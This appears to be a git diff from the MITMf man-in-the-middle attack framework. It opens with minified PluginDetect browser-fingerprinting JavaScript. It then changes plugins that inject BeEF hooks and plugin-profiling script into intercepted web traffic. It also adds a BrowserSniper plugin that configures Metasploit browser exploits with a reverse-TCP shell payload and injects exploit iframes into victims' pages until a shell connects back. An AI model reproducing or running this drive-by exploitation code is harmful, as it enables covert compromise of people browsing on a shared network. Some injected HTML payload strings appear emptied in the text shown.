PluginDetect.browser.isIE?!p.javaEnabled():0},VerifyTagsDefault_1:function(){var q=PluginDetect.browser,p=1;if(q.isIE&&!q.ActiveXEnabled){p=0}if((q.isIE&&q.verIE<9)||(q.verGecko&&PluginDetect.compareNums(q.verGecko,PluginDetect.formatNum("2"))<0)||(q.isSafari&&(!q.verSafari||PluginDetect.compareNums(q.verSafari,PluginDetect.formatNum("4"))<0))||(q.isOpera&&PluginDetect.compareNums(q.verOpera,PluginDetect.formatNum("11"))<0)){p=0}return p}},can_Insert_Query:function(s){var q=this,r=q.results[0][0],p=q.getResult()[0];if(q.HTML[s]||(s===0&&r!==null&&!q.isRange(r))||(s===0&&p&&!q.isRange(p))){return 0}return !q.isDisabled.single(s)},can_Insert_Query_Any:function(){var q=this,p;for(p=0;p0||!r.isRange(p));if(!r.can_Insert_Query(s)||t[s]===0){return 0}if(t[s]==3||(t[s]==2.8&&!p)){return 1}if(!q.nonAppletDetectionOk(q.version0)){if(t[s]==2||(t[s]==1&&!p)){return 1}}return 0},should_Insert_Query_Any:function(){var q=this,p;for(p=0;p]/).test(p||"")?(p.charAt(0)==">"?1:-1):0},setRange:function(q,p){return(q?(q>0?">":"<"):"")+(PluginDetect.isString(p)?p:"")},insertJavaTag:function(z,w,p,s,D){var t=a,v="A.class",A=PluginDetect.file.getValid(t),y=A.name+A.ext,x=A.path;var u=["archive",y,"code",v],E=(s?["width",s]:[]).concat(D?["height",D]:[]),r=["mayscript","true"],C=["scriptable","true","codebase_lookup","false"].concat(r),B=t.navigator,q=!PluginDetect.browser.isIE&&B.mimeObj&&B.mimeObj.type?B.mimeObj.type:t.mimeType[0];if(z==1){return PluginDetect.browser.isIE?PluginDetect.DOM.insert("object",["type",q].concat(E),["codebase",x].concat(u).concat(C),p,t,0,w):PluginDetect.DOM.insert("object",["type",q].concat(E),["codebase",x].concat(u).concat(C),p,t,0,w)}if(z==2){return PluginDetect.browser.isIE?PluginDetect.DOM.insert("applet",["alt",p].concat(r).concat(u).concat(E),["codebase",x].concat(C),p,t,0,w):PluginDetect.DOM.insert("applet",["codebase",x,"alt",p].concat(r).concat(u).concat(E),[].concat(C),p,t,0,w)}if(z==3){return PluginDetect.browser.isIE?PluginDetect.DOM.insert("object",["classid",t.classID].concat(E),["codebase",x].concat(u).concat(C),p,t,0,w):PluginDetect.DOM.insert()}if(z==4){return PluginDetect.DOM.insert("embed",["codebase",x].concat(u).concat(["type",q]).concat(C).concat(E),[],p,t,0,w)}return PluginDetect.DOM.insert()},insertIframe:function(p){return PluginDetect.DOM.iframe.insert(99,p)},insert_Query_Any:function(w){var q=this,r=a,y=PluginDetect.DOM,u=q.results,x=q.HTML,p=y.altHTML,t,s,v=PluginDetect.file.getValid(r);if(q.should_Insert_Query(0)){if(r.OTF<2){r.OTF=2}u[0]=[0,0];t=w?q.codebase.isMin(w):q.codebase.search();if(t){u[0][0]=w?q.setRange(t,w):t}q.active[0]=t?1.5:-1}if(!v){return q.getResult()}if(!q.DummySpanTagHTML){s=q.insertIframe("applet.DummySpanTagHTML");q.DummySpanTagHTML=y.insert("",[],[],p,0,0,s);y.iframe.close(s)}if(q.should_Insert_Query(1)){if(r.OTF<2){r.OTF=2}s=q.insertIframe("applet.HTML[1]");x[1]=q.insertJavaTag(1,s,p);y.iframe.close(s);u[1]=[0,0];q.query(1)}if(q.should_Insert_Query(2)){if(r.OTF<2){r.OTF=2}s=q.insertIframe("applet.HTML[2]");x[2]=q.insertJavaTag(2,s,p);y.iframe.close(s);u[2]=[0,0];q.query(2)}if(q.should_Insert_Query(3)){if(r.OTF<2){r.OTF=2}s=q.insertIframe("applet.HTML[3]");x[3]=q.insertJavaTag(3,s,p);y.iframe.close(s);u[3]=[0,0];q.query(3)}if(y.isEnabled.objectTag()){if(!q.DummyObjTagHTML&&(x[1]||x[2])){s=q.insertIframe("applet.DummyObjTagHTML");q.DummyObjTagHTML=y.insert("object",["type",r.mimeType_dummy],[],p,0,0,s);y.iframe.close(s)}if(!q.DummyObjTagHTML2&&x[3]){s=q.insertIframe("applet.DummyObjTagHTML2");q.DummyObjTagHTML2=y.insert("object",["classid",r.classID_dummy],[],p,0,0,s);y.iframe.close(s)}}r.NOTF.init();return q.getResult()}},NOTF:{count:0,count2:0,countMax:25,intervalLength:250,init:function(){var q=this,p=a;if(p.OTF<3&&q.shouldContinueQuery()){p.OTF=3;PluginDetect.ev.setTimeout(q.onIntervalQuery,q.intervalLength);}},allHTMLloaded:function(){var r=a.applet,q,p=[r.DummySpanTagHTML,r.DummyObjTagHTML,r.DummyObjTagHTML2].concat(r.HTML);for(q=0;q2){return p}}else{t.count2=t.count}for(q=0;q=2||(r.allowed[q]==1&&!r.getResult()[0]))&&(!t.count||t.isAppletActive(q)>=0)){p=1}}}return p},isJavaActive:function(s){var u=this,r=a,p,q,t=-9;for(p=0;pt){t=q}}return t},isAppletActive:function(t,u){var v=this,q=a,A=q.navigator,p=q.applet,w=p.HTML[t],s=p.active,z,r=0,y,B=s[t];if(u||B>=1.5||!w||!w.span()){return B}y=PluginDetect.DOM.getTagStatus(w,p.DummySpanTagHTML,p.DummyObjTagHTML,p.DummyObjTagHTML2,v.count);for(z=0;z0){r=1}}if(y!=1){B=y}else{if(PluginDetect.browser.isIE||(q.version0&&A.javaEnabled()&&A.mimeObj&&(w.tagName=="object"||r))){B=1}else{B=0}}s[t]=B;return B},onIntervalQuery:function(){var q=a.NOTF,p;q.count++;if(a.OTF==3){p=q.queryAllApplets();if(!q.shouldContinueQuery()){q.queryCompleted(p)}}if(a.OTF==3){PluginDetect.ev.setTimeout(q.onIntervalQuery,q.intervalLength)}},queryAllApplets:function(){var t=this,s=a,r=s.applet,q,p;for(q=0;q=4){return}q.OTF=4;r.isJavaActive();q.setPluginStatus(p[0],p[1],0);PluginDetect.ev.callArray(q.DoneHndlrs);}}};PluginDetect.addPlugin("java",a);var m={getVersion:function(){var r=this,p=null,q;if((!q||PluginDetect.dbug)&&r.nav.query().installed){q=1}if((!p||PluginDetect.dbug)&&r.nav.query().version){p=r.nav.version}if((!q||PluginDetect.dbug)&&r.axo.query().installed){q=1}if((!p||PluginDetect.dbug)&&r.axo.query().version){p=r.axo.version}r.installed=p?1:(q?0:-1);r.version=PluginDetect.formatNum(p)},nav:{hasRun:0,installed:0,version:null,mimeType:"application/x-devalvrx",query:function(){var s=this,p,r,q=s.hasRun||!PluginDetect.hasMimeType(s.mimeType);s.hasRun=1;if(q){return s}r=PluginDetect.pd.findNavPlugin({find:"DevalVR.*Plug-?in",mimes:s.mimeType,plugins:"DevalVR 3D Plugin"});if(r&&(/Plug-?in(.*)/i).test(r.description||"")){p=PluginDetect.getNum(RegExp.$1)}if(r){s.installed=1}if(p){s.version=p}return s}},axo:{hasRun:0,installed:0,version:null,progID:["DevalVRXCtrl.DevalVRXCtrl","DevalVRXCtrl.DevalVRXCtrl.1"],classID:"clsid:5D2CF9D0-113A-476B-986F-288B54571614",query:function(){var s=this,v=m,q,p,u,r,t=s.hasRun;s.hasRun=1;if(t){return s}for(p=0;p=30226){p[0]="2"}q=p.join(",")}if(q){t.version=q}return t}},axo:{hasRun:0,installed:0,version:null,progID:"AgControl.AgControl",maxdigit:[20,10,10,100,100,10],mindigit:[0,0,0,0,0,0],IsVersionSupported:function(s,q){var p=this;try{return p.testVersion?PluginDetect.compareNums(PluginDetect.formatNum(p.testVersion.join(",")),PluginDetect.formatNum(q.join(",")))>=0:s.IsVersionSupported(p.format(q))}catch(r){}return 0},format:function(q){var p=this;return(q[0]+"."+q[1]+"."+q[2]+p.make2digits(q[3])+p.make2digits(q[4])+"."+q[5])},make2digits:function(p){return(p<10?"0":"")+p+""},query:function(){var r=this,q,v,s=r.hasRun;r.hasRun=1;if(s){return r}v=PluginDetect.getAXO(r.progID);if(v){r.installed=1}if(v&&r.IsVersionSupported(v,r.mindigit)){var p=[].concat(r.mindigit),u,t=0;for(q=0;q1&&u<20){u++;t++;p[q]=Math.round((r.maxdigit[q]+r.mindigit[q])/2);if(r.IsVersionSupported(v,p)){r.mindigit[q]=p[q]}else{r.maxdigit[q]=p[q]}}p[q]=r.mindigit[q]}r.version=r.format(p);}return r}}};PluginDetect.addPlugin("silverlight",h);var f={compareNums:function(s,r){var A=s.split(PluginDetect.splitNumRegx),y=r.split(PluginDetect.splitNumRegx),w,q,p,v,u,z;for(w=0;w0)?RegExp.$2.charCodeAt(0):-1;z=/([\d]+)([a-z]?)/.test(y[w]);p=parseInt(RegExp.$1,10);u=(w==2&&RegExp.$2.length>0)?RegExp.$2.charCodeAt(0):-1;if(q!=p){return(q>p?1:-1)}if(w==2&&v!=u){return(v>u?1:-1)}}return 0},setPluginStatus:function(r,p,s){var q=this;q.installed=p?1:(s?(s>0?0.7:-0.1):(r?0:-1));if(p){q.version=PluginDetect.formatNum(p)}q.getVersionDone=q.installed==0.7||q.installed==-0.1?0:1;},getVersion:function(s){var t=this,r,p=null,q;if((!r||PluginDetect.dbug)&&t.nav.query().installed){r=1}if((!p||PluginDetect.dbug)&&t.nav.query().version){p=t.nav.version}if((!r||PluginDetect.dbug)&&t.axo.query().installed){r=1}if((!p||PluginDetect.dbug)&&t.axo.query().version){p=t.axo.version}if(!p||PluginDetect.dbug){q=t.codebase.isMin(s);if(q){t.setPluginStatus(0,0,q);return}}if(!p||PluginDetect.dbug){q=t.codebase.search();if(q){r=1;p=q}}t.setPluginStatus(r,p,0)},nav:{hasRun:0,installed:0,version:null,mimeType:["application/x-vlc-plugin","application/x-google-vlc-plugin","application/mpeg4-muxcodetable","application/x-matroska","application/xspf+xml","video/divx","video/webm","video/x-mpeg","video/x-msvideo","video/ogg","audio/x-flac","audio/amr","audio/amr"],find:"VLC.*Plug-?in",find2:"VLC|VideoLAN",avoid:"Totem|Helix",plugins:["VLC Web Plugin","VLC Multimedia Plug-in","VLC Multimedia Plugin","VLC multimedia plugin"],query:function(){var s=this,p,r,q=s.hasRun||!PluginDetect.hasMimeType(s.mimeType);s.hasRun=1;if(q){return s}r=PluginDetect.pd.findNavPlugin({find:s.find,avoid:s.avoid,mimes:s.mimeType,plugins:s.plugins});if(r){s.installed=1;if(r.description){p=PluginDetect.getNum(r.description+"","[\\d][\\d\\.]*[a-z]*")}if(p){s.version=p}}return s}},axo:{hasRun:0,installed:0,version:null,progID:"VideoLAN.VLCPlugin",query:function(){var q=this,s,p,r=q.hasRun;q.hasRun=1;if(r){return q}s=PluginDetect.getAXO(q.progID);if(s){q.installed=1;p=PluginDetect.getNum(PluginDetect.pd.getPROP(s,"VersionInfo"),"[\\d][\\d\\.]*[a-z]*");if(p){q.version=p}}return q}},codebase:{classID:"clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921",isMin:function(p){this.$$=f;return PluginDetect.codebase.isMin(this,p)},search:function(){this.$$=f;return PluginDetect.codebase.search(this)},DIGITMAX:[[11,11,16]],DIGITMIN:[0,0,0,0],Upper:["999"],Lower:["0"],convert:[1]}};PluginDetect.addPlugin("vlc",f);var c={OTF:null,setPluginStatus:function(){var p=this,B=p.OTF,v=p.nav.detected,x=p.nav.version,z=p.nav.precision,C=z,u=x,s=v>0;var H=p.axo.detected,r=p.axo.version,w=p.axo.precision,D=p.doc.detected,G=p.doc.version,t=p.doc.precision,E=p.doc2.detected,F=p.doc2.version,y=p.doc2.precision;u=F||u||r||G;C=y||C||w||t;s=E>0||s||H>0||D>0;u=u||null;p.version=PluginDetect.formatNum(u);p.precision=C;var q=-1;if(B==3){q=p.version?0.5:-0.5}else{if(u){q=1}else{if(s){q=0}else{if(H==-0.5||D==-0.5){q=-0.15}else{if(PluginDetect.browser.isIE&&(!PluginDetect.browser.ActiveXEnabled||PluginDetect.browser.ActiveXFilteringEnabled)){q=-1.5}}}}}p.installed=q;if(p.getVersionDone!=1){var A=1;if((p.verify&&p.verify.isEnabled())||p.installed==0.5||p.installed==-0.5){A=0}else{if(p.doc2.isDisabled()==1){A=0}}p.getVersionDone=A}},getVersion:function(s,r){var p=this,q=0,t=p.verify;if(p.getVersionDone===null){p.OTF=0;if(t){t.init()}}PluginDetect.file.save(p,".pdf",r);if(p.getVersionDone===0){p.doc2.insertHTMLQuery();p.setPluginStatus();return}if((!q||PluginDetect.dbug)&&p.nav.query().version){q=1}if((!q||PluginDetect.dbug)&&p.axo.query().version){q=1}if((!q||PluginDetect.dbug)&&p.doc.query().version){q=1}if(1){p.doc2.insertHTMLQuery()}p.setPluginStatus()},getPrecision:function(v,u,t){if(PluginDetect.isString(v)){u=u||"";t=t||"";var q,s="\\d+",r="[\\.]",p=[s,s,s,s];for(q=4;q>0;q--){if((new RegExp(u+p.slice(0,q).join(r)+t)).test(v)){return q}}}return 0},nav:{detected:0,version:null,precision:0,mimeType:["application/pdf","application/vnd.adobe.pdfxml"],find:"Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in",plugins:["Adobe Acrobat","Adobe Acrobat and Reader Plug-in","Adobe Reader Plugin"],query:function(){var r=this,q,p=null;if(r.detected||!PluginDetect.hasMimeType(r.mimeType)){return r}q=PluginDetect.pd.findNavPlugin({find:r.find,mimes:r.mimeType,plugins:r.plugins});r.detected=q?1:-1;if(q){p=PluginDetect.getNum(q.description)||PluginDetect.getNum(q.name);p=PluginDetect.getPluginFileVersion(q,p);if(!p){p=r.attempt3()}if(p){r.version=p;r.precision=c.getPrecision(p)}}return r},attempt3:function(){var p=null;if(PluginDetect.OS==1){if(PluginDetect.hasMimeType("application/vnd.adobe.pdfxml")){p="9"}else{if(PluginDetect.hasMimeType("application/vnd.adobe.x-mars")){p="8"}else{if(PluginDetect.hasMimeType("application/vnd.adobe.xfdf")){p="6"}}}}return p}},activexQuery:function(w){var u="",t,q,s,r,p={precision:0,version:null};try{if(w){u=w.GetVersions()+"";}}catch(v){}if(u&&PluginDetect.isString(u)){t=/\=\s*[\d\.]+/g;r=u.match(t);if(r){for(q=0;q0)){p.version=s}}p.precision=c.getPrecision(u,"\\=\\s*")}}return p},axo:{detected:0,version:null,precision:0,progID:["AcroPDF.PDF","AcroPDF.PDF.1","PDF.PdfCtrl","PDF.PdfCtrl.5","PDF.PdfCtrl.1"],progID_dummy:"AcroDUMMY.DUMMY",query:function(){var t=this,q=c,u,v,s,r,p,w;if(t.detected){return t}t.detected=-1;v=PluginDetect.getAXO(t.progID_dummy);if(!v){w=PluginDetect.errObj}for(p=0;p0||w?1:(q==-0.1||q==-0.5?-0.5:-1);if(w){y.version=w}if(t){y.precision=t}return y}},doc2:{detected:0,version:null,precision:0,classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",mimeType:"application/pdf",HTML:0,count:0,count2:0,time2:0,intervalLength:50,maxCount:150,isDisabled:function(){var r=this,v=c,u=v.axo,p=v.nav,x=v.doc,w,t,q=0,s;if(r.HTML){q=2}else{if(PluginDetect.dbug){}else{if(!PluginDetect.DOM.isEnabled.objectTagUsingActiveX()){q=2}else{w=(p?p.version:0)||(u?u.version:0)||(x?x.version:0)||0;t=(p?p.precision:0)||(u?u.precision:0)||(x?x.precision:0)||0;if(!w||!t||t>2||PluginDetect.compareNums(PluginDetect.formatNum(w),PluginDetect.formatNum("11"))<0){q=2}}}}if(q<2){s=PluginDetect.file.getValid(v);if(!s||!s.full){q=1}}return q},handlerSet:0,onMessage:function(){var p=this;return function(q){if(p.version){return}p.detected=1;if(PluginDetect.isArray(q)){q=q[0]}q=PluginDetect.getNum(q+"");if(q){if(!(/[.,_]/).test(q)){q+="."}q+="00000";if((/^(\d+)[.,_](\d)(\d\d)(\d\d)/).test(q)){q=RegExp.$1+","+RegExp.$2+","+RegExp.$3+","+RegExp.$4}p.version=PluginDetect.formatNum(q);p.precision=3;c.setPluginStatus()}}},isDefinedMsgHandler:function(q,r){try{return q?q.messageHandler!==r:0}catch(p){}return 1},queryObject:function(){var r=this,s=r.HTML,q=s?s.obj():0;if(!q){return}if(!r.handlerSet&&r.isDefinedMsgHandler(q)){try{q.messageHandler={onMessage:r.onMessage()}}catch(p){}r.handlerSet=1;r.count2=r.count;r.time2=(new Date()).getTime()}if(!r.detected){if(r.count>3&&!r.handlerSet){r.detected=-1}else{if(r.time2&&r.count-r.count2>=r.maxCount&&(new Date()).getTime()-r.time2>=r.intervalLength*r.maxCount){r.detected=-0.5}}}if(r.detected){if(r.detected!=-1){}}},insertHTMLQuery:function(){var u=this,p=c,r=PluginDetect.DOM.altHTML,q,s,t=0;if(u.isDisabled()){return u}if(p.OTF<2){p.OTF=2}q=PluginDetect.file.getValid(p).full;s=PluginDetect.DOM.iframe.insert(0,"Adobe Reader");PluginDetect.DOM.iframe.write(s,'' % (self.ip_address, beefconfig['beefport'])
-
- beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
- if not beef.login(beefconfig['user'], beefconfig['pass']):
- sys.exit("[-] Error logging in to BeEF!")
- self.tree_output.append("Mode: %s" % self.Mode)
+ self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
+ self.onConfigChange()
- t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
- t.setDaemon(True)
- t.start()
+ def onConfigChange(self):
- def autorun(self, beef):
+ beefconfig = self.config['MITMf']['BeEF']
+
+ self.html_payload = ''.format(self.ip_address, beefconfig['beefport'])
+
+ self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
+ if not self.beef.login(beefconfig['user'], beefconfig['pass']):
+ shutdown("[-] Error logging in to BeEF!")
+
+ def startThread(self, options):
+ self.autorun()
+
+ def autorun(self):
already_ran = []
already_hooked = []
while True:
- sessions = beef.sessions_online()
+ mode = self.config['BeEFAutorun']['mode']
+ sessions = self.beef.sessions_online()
if (sessions is not None and len(sessions) > 0):
for session in sessions:
if session not in already_hooked:
- info = beef.hook_info(session)
- mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
+ info = self.beef.hook_info(session)
+ mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
already_hooked.append(session)
self.black_ips.append(str(info['ip']))
- if self.Mode == 'oneshot':
+ if mode == 'oneshot':
if session not in already_ran:
- self.execModules(session, beef)
+ self.execModules(session)
already_ran.append(session)
- elif self.Mode == 'loop':
- self.execModules(session, beef)
+ elif mode == 'loop':
+ self.execModules(session)
sleep(10)
else:
sleep(1)
- def execModules(self, session, beef):
- session_info = beef.hook_info(session)
- session_ip = session_info['ip']
- hook_browser = session_info['name']
- hook_os = session_info['os']
+ def execModules(self, session):
+ session_info = self.beef.hook_info(session)
+ session_ip = session_info['ip']
+ hook_browser = session_info['name']
+ hook_os = session_info['os']
+ all_modules = self.config['BeEFAutorun']["ALL"]
+ targeted_modules = self.config['BeEFAutorun']["targets"]
- if len(self.All_modules) > 0:
- mitmf_logger.info("%s >> sending generic modules" % session_ip)
- for module, options in self.All_modules.iteritems():
- mod_id = beef.module_id(module)
- resp = beef.module_run(session, mod_id, json.loads(options))
+ if len(all_modules) > 0:
+ mitmf_logger.info("{} >> sending generic modules".format(session_ip))
+ for module, options in all_modules.iteritems():
+ mod_id = self.beef.module_id(module)
+ resp = self.beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
- mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
+ mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
else:
- mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
+ mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
sleep(0.5)
- mitmf_logger.info("%s >> sending targeted modules" % session_ip)
- for os in self.Targeted_modules:
+ mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
+ for os in targeted_modules:
if (os in hook_os) or (os == hook_os):
- browsers = self.Targeted_modules[os]
+ browsers = targeted_modules[os]
if len(browsers) > 0:
for browser in browsers:
if browser == hook_browser:
- modules = self.Targeted_modules[os][browser]
+ modules = targeted_modules[os][browser]
if len(modules) > 0:
for module, options in modules.iteritems():
- mod_id = beef.module_id(module)
- resp = beef.module_run(session, mod_id, json.loads(options))
+ mod_id = self.beef.module_id(module)
+ resp = self.beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
- mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
+ mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
else:
- mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
+ mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
sleep(0.5)
diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py
index 8f3afa1..aa831f4 100644
--- a/plugins/BrowserProfiler.py
+++ b/plugins/BrowserProfiler.py
@@ -17,113 +17,49 @@
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
-
-from plugins.plugin import Plugin
-from plugins.Inject import Inject
-from pprint import pformat
import logging
-mitmf_logger = logging.getLogger('mitmf')
+from pprint import pformat
+from plugins.plugin import Plugin
+from plugins.Inject import Inject
+
+mitmf_logger = logging.getLogger("mitmf")
class BrowserProfiler(Inject, Plugin):
- name = "Browser Profiler"
+ name = "BrowserProfiler"
optname = "browserprofiler"
desc = "Attempts to enumerate all browser plugins of connected clients"
- implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
- depends = ["Inject"]
- version = "0.2"
+ version = "0.3"
has_opts = False
def initialize(self, options):
+ self.output = {} # so other plugins can access the results
+
Inject.initialize(self, options)
self.html_payload = self.get_payload()
- self.dic_output = {} # so other plugins can access the results
-
+
def post2dict(self, post): #converts the ajax post to a dic
- dict = {}
+ d = dict()
for line in post.split('&'):
t = line.split('=')
- dict[t[0]] = t[1]
- return dict
+ d[t[0]] = t[1]
+ return d
- def sendPostData(self, request):
+ def clientRequest(self, request):
#Handle the plugin output
if 'clientprfl' in request.uri:
- self.dic_output = self.post2dict(request.postData)
- self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client
- if self.dic_output['plugin_list'] > 0:
- self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
- pretty_output = pformat(self.dic_output)
- mitmf_logger.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
+ request.printPostData = False
+
+ self.output = self.post2dict(request.postData)
+ self.output['ip'] = request.client.getClientIP()
+ self.output['useragent'] = request.clientInfo
+
+ if self.output['plugin_list']:
+ self.output['plugin_list'] = self.output['plugin_list'].split(',')
+
+ pretty_output = pformat(self.output)
+ mitmf_logger.info("{} [BrowserProfiler] Got data:\n{}".format(request.client.getClientIP(), pretty_output))
def get_payload(self):
- payload = """"""
-
- return payload
+ plugindetect = open("./core/javascript/plugindetect.js", 'r').read()
+ return ''
diff --git a/plugins/BrowserSniper.py b/plugins/BrowserSniper.py
new file mode 100644
index 0000000..e74c405
--- /dev/null
+++ b/plugins/BrowserSniper.py
@@ -0,0 +1,194 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import string
+import random
+import logging
+
+from time import sleep
+from core.msfrpc import Msf
+from core.utils import SystemConfig, shutdown
+from plugins.plugin import Plugin
+from plugins.BrowserProfiler import BrowserProfiler
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class BrowserSniper(BrowserProfiler, Plugin):
+ name = "BrowserSniper"
+ optname = "browsersniper"
+ desc = "Performs drive-by attacks on clients with out-of-date browser plugins"
+ version = "0.4"
+ has_opts = False
+
+ def initialize(self, options):
+ self.options = options
+ self.msfip = SystemConfig.getIP(options.interface)
+ self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit
+
+ #Initialize the BrowserProfiler plugin
+ BrowserProfiler.initialize(self, options)
+
+ msfversion = Msf().version()
+ self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
+
+ def startThread(self, options):
+ self.snipe()
+
+ def onConfigChange(self):
+ self.initialize(self.options)
+
+ def _genRandURL(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
+ return "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5))
+
+ def _getRandPort(self):
+ return random.randint(1000, 65535)
+
+ def _setupExploit(self, exploit, msfport):
+
+ rand_url = self._genRandURL()
+ rand_port = self._getRandPort()
+ #generate the command string to send to the virtual console
+ #new line character very important as it simulates a user pressing enter
+ cmd = "use exploit/{}\n".format(exploit)
+ cmd += "set SRVPORT {}\n".format(msfport)
+ cmd += "set URIPATH {}\n".format(rand_url)
+ cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
+ cmd += "set LHOST {}\n".format(self.msfip)
+ cmd += "set LPORT {}\n".format(rand_port)
+ cmd += "set ExitOnSession False\n"
+ cmd += "exploit -j\n"
+
+ Msf().sendcommand(cmd)
+
+ return (rand_url, rand_port)
+
+ def _compat_system(self, os_config, brw_config):
+ os = self.output['useragent'][0].lower()
+ browser = self.output['useragent'][1].lower()
+
+ if (os_config == 'any') and (brw_config == 'any'):
+ return True
+
+ if (os_config == 'any') and (brw_config in browser):
+ return True
+
+ if (os_config in os) and (brw_config == 'any'):
+ return True
+
+ if (os_config in os) and (brw_config in browser):
+ return True
+
+ return False
+
+ def getExploits(self):
+ exploits = list()
+ vic_ip = self.output['ip']
+
+ #First get the client's info
+ java = None
+ if (self.output['java_installed'] == '1') and (self.output['java_version'] != 'null'):
+ java = self.output['java_version']
+
+ flash = None
+ if (self.output['flash_installed'] == '1') and (self.output['flash_version'] != 'null'):
+ flash = self.output['flash_version']
+
+ mitmf_logger.debug("{} [BrowserSniper] Java installed: {} | Flash installed: {}".format(vic_ip, java, flash))
+
+ for exploit, details in self.config['BrowserSniper'].iteritems():
+
+ if self._compat_system(details['OS'].lower(), details['Browser'].lower()):
+
+ if details['Type'].lower() == 'browservuln':
+ exploits.append(exploit)
+
+ elif details['Type'].lower() == 'pluginvuln':
+
+ if details['Plugin'].lower() == 'java':
+ if (java is not None) and (java in details['PluginVersions']):
+ exploits.append(exploit)
+
+ elif details['Plugin'].lower() == 'flash':
+
+ if (flash is not None) and (flash in details['PluginVersions']):
+ exploits.append(exploit)
+
+ mitmf_logger.debug("{} [BrowserSniper] Compatible exploits: {}".format(vic_ip, exploits))
+ return exploits
+
+ def injectAndPoll(self, ip, inject_payload): #here we inject an iframe to trigger the exploit and check for resulting sessions
+
+ #inject iframe
+ mitmf_logger.info("{} [BrowserSniper] Now injecting iframe to trigger exploits".format(ip))
+ self.html_payload = inject_payload #temporarily changes the code that the Browserprofiler plugin injects
+
+ #The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds
+ #Will also make sure the shell actually came from the box that we targeted
+ mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip))
+
+ poll_n = 1
+ msf = Msf()
+ while poll_n != 30:
+
+ if msf.sessionsfrompeer(ip):
+ mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip))
+ self.sploited_ips.append(ip)
+ self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
+ self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
+ return
+
+ poll_n += 1
+ sleep(2)
+
+ mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip))
+ self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
+
+ def snipe(self):
+ while True:
+ if self.output:
+ vic_ip = self.output['ip']
+ msfport = self.config['MITMf']['Metasploit']['msfport']
+ exploits = self.getExploits()
+
+ if not exploits:
+ if vic_ip not in self.sploited_ips:
+ mitmf_logger.info('{} [BrowserSniper] Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip))
+ self.sploited_ips.append(vic_ip)
+ self.black_ips = self.sploited_ips
+
+ elif exploits and (vic_ip not in self.sploited_ips):
+ mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits)))
+ inject_payload = ''
+
+ msf = Msf()
+ for exploit in exploits:
+
+ pid = msf.findpid(exploit)
+ if pid:
+ mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit))
+ url = msf.jobinfo(pid)['uripath'] #get the url assigned to the exploit
+ inject_payload += "".format(self.msfip, msfport, url)
+ else:
+ url, port = self._setupExploit(exploit, msfport)
+ inject_payload += "".format(self.msfip, port, url)
+
+ self.injectAndPoll(vic_ip, inject_payload)
+
+ sleep(1)
diff --git a/plugins/CacheKill.py b/plugins/CacheKill.py
index b912244..9525e86 100644
--- a/plugins/CacheKill.py
+++ b/plugins/CacheKill.py
@@ -18,29 +18,28 @@
# USA
#
+import logging
from plugins.plugin import Plugin
+mitmf_logger = logging.getLogger("mitmf")
class CacheKill(Plugin):
name = "CacheKill"
optname = "cachekill"
desc = "Kills page caching by modifying headers"
- implements = ["handleHeader", "connectionMade"]
- bad_headers = ['if-none-match', 'if-modified-since']
version = "0.1"
- has_opts = True
- def add_options(self, options):
- options.add_argument("--preserve-cookies", action="store_true", help="Preserve cookies (will allow caching in some situations).")
+ def initialize(self, options):
+ self.bad_headers = ['if-none-match', 'if-modified-since']
